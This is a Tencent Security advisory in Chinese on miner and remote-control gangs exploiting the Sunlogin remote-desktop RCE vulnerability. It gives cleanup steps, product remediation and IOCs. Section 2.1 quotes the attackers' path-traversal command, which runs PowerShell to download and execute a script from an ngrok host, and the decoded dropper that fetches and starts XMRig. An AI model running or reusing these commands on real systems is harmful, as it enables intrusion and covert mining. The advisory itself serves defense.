一、概述
近日,腾讯安全威胁情报中心检测到有挖矿、远控黑产团伙利用向日葵远控软件RCE漏洞攻击企业主机和个人电脑,已有部分未修复漏洞的主机、个人电脑受害。攻击者利用漏洞入侵后可直接获得系统控制权,受害主机已被用于门罗币挖矿。
在部分城市因疫情管理需要,远程办公场景增多,向日葵类远程控制软件的应用也会增加,从而系统被黑客利用漏洞入侵控制的风险也随之增加。腾讯安全专家建议政企机构与个人电脑用户将向日葵远控软件升级到最新版本以修复漏洞,建议避免将不必要的端口及服务在公网开放,避免将个人远控软件安装在业务服务器中。推荐使用腾讯零信任iOA、或腾讯电脑管家进行病毒扫描,排查系统是否已被入侵,采用零信任iOA解决远程安全接入需求,避免疫情期间系统被黑客控制而造成损失。
向日葵是一款免费的,集远程控制电脑、手机、远程桌面连接、远程开机、远程管理、支持内网穿透等功能的一体化远程控制管理软件。今年2月,向日葵个人版V11.0.0.33之前的版本与简约版V1.0.1.43315(2021.12)之前的版本被披露存在远程代码执行(RCE)漏洞,漏洞编号CNVD-2022-10270,CNVD-2022-03672。
存在漏洞的系统启动服务端软件后,会开放未授权访问端口,攻击者可通过未授权访问无需密码直接获取session,并借此远程执行任意代码。从而导致存在漏洞的个人电脑或服务器被黑客入侵控制。
在上述高危漏洞出现后,腾讯安全旗下的主机安全产品、零信任iOA、漏洞扫描服务、高危威胁检测系统均已支持对向日葵RCE漏洞的检测和防御。
腾讯零信任iOA拦截利用向日葵RCE漏洞的攻击
本次利用向日葵远程代码执行漏洞攻击传播的挖矿木马为XMRig(门罗币)挖矿程序,企业或个人用户可参考以下内容自查后清理:
1.查看任务管理器,结束高CPU/GPU占用的程序;
2.查看c:\users\public\目录下是否存在木马文件xmrig.exe、WinRing0x64.sys、config.json,如果有,就删除这些文件。
远控木马使用Farfli家族开源代码编译而成,自查与清理方式:
1.查看Svchost下的服务名,清理服务NETRUDSL
通过运行msconfig,或regedit检查以下相关系统服务是否存在:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost
2.删除远控木马文件
C:\Windows\33649531.dll(在不同主机上33649531为随机8位数字)
腾讯安全系列产品已支持检测、查杀利用向日葵远程代码执行漏洞攻击传播的XMRig类挖矿木马与Farfli家族远控木马,具体响应清单如下:
更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/
二、详细分析
2.1挖矿木马
利用漏洞投递并执行恶意脚本:
ping../../../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe -exec bypass -noexit -C IEX (new-object system.net.webclient).downloadstring(/"http://pingce.jp.ngrok.io/ob.ps1/")
脚本内容解码后如下:
$url = "http://pingce.jp.ngrok.io/xmrig.exe"
$url2 = "http://pingce.jp.ngrok.io/config.json"
$url3 = "http://pingce.jp.ngrok.io/WinRing0x64.sys"
$output = "C:\users\public\xmrig.exe"
$output2 = "C:\users\public\config.json"
$output3 = "C:\users\public\WinRing0x64.sys"
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $output)
$wc.DownloadFile($url2, $output2)
$wc.DownloadFile($url3, $output3)
taskkill /f /t /im xmrig.exe
Remove-Item -Path "C:\Users\public\c3pool" -Recurse
Start-Sleep -s 15
start-process "c:\users\public\xmrig.exe" -ArgumentList "-c c:\users\public\config.json"
释放系统挖矿进程,启动指定配置的XMRig挖矿程序。
2.2远控木马
木马外壳分区段装载远控木马,tProtectVirtualMemory修改内存属性为可读可执行。
最终释放出的可执行文件为Farfli家族开源代码编译而成的远控木马。
该木马对外提供的功能模块
三、威胁处置手册
1.清理木马
云主机用户可使用腾讯主机安全的快扫功能,清理查杀利用向日葵远控RCE漏洞攻击传播的后门木马:通过腾讯主机安全(云镜)控制台,入侵检测->文件查杀,检测全网资产,检测恶意文件,若发现,可进行一键隔离操作。
步骤如下:
A: 主机安全(云镜)控制台:入侵检测->文件查杀,选择一键检测:
B:弹出一键检测设置,选择快速扫描,全部专业版主机后开启扫描:
C:查看扫描出的木马风险结果项
D:对检出的木马文件进行一键隔离(注意勾选隔离同时结束木马进程选项)
- 修复漏洞
云主机可使用腾讯主机安全(云镜)的漏洞检测修复功能,协助用户快速修补相关高危漏洞,用户可登录腾讯主机安全控制台,依次打开左侧“漏洞管理”,对扫描到的系统组件漏洞、web应用漏洞、应用漏洞进行排查。
步骤细节如下:
A:主机安全(云镜)控制台:打开漏洞管理->漏洞风险检测,点击一键检测,进行资产漏洞扫描
B:查看扫描到的向日葵远程代码执行漏洞风险项目详情
C:根据检测结果,对检测到有风险的资产进行漏洞修复(登录相应主机,升级向日葵远控工具软件到最新版本)。
D:回到主机安全(云镜)控制台再次打开“漏洞管理”,重新检测确保资产已不受漏洞影响。
3.防御
腾讯云防火墙已支持检测防御利用向日葵远程代码执行漏洞的攻击,公有云客户可以开通腾讯云防火墙高级版进行有效防御:
在腾讯云控制台界面,打开入侵防御设置即可。
IOCs
【挖矿木马】
Domain
pingce[.]jp[.]ngrok[.]io
md5
0c0195c48b6b8582fa6f6373032118da
e6d26c76401c990bc94f4131350cde3e
【远控】
C2
s1[.]yk[.]hyi8mc[.]top
md5
3f5da20aff1364faa177e90ac325cbd0
dd4786854b9e61fa1637d69a3eb71f93